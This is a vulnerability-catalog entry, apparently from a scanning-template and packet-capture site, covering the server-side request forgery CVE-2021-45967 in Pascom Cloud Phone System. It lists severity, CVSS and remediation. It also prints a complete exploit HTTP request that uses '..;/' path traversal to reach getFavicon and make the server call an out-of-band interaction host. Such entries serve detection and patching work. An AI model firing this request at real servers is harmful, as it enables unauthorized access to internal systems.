| Title | Pascom CPS Server-Side Request Forgery |
|---|---|
| Author | dwisiswant0 |
| Severity | Critical |
| Impact | The vulnerability can result in unauthorized access to sensitive data or systems, potentially leading to further exploitation or compromise. |
| Remediation | Apply the latest security patches or updates provided by Pascom to fix the Server-Side Request Forgery vulnerability (CVE-2021-45967). |
| CVSS Score | 9.8 |
| EPSS Score | 0.8933 |
| CVE ID | CVE-2021-45967 |
| CWE ID | CWE-22 |
| Tags | cve cve2021 pascom ssrf pascom_cloud_phone_system vkev vuln |
Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.
GET /services/pluginscript/..;/..;/..;/getFavicon?host=d5jobm9le0o45f7qlpi0cmn6nzmts3yko.oast.site HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-45967.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-45967.pcap
N/AN/A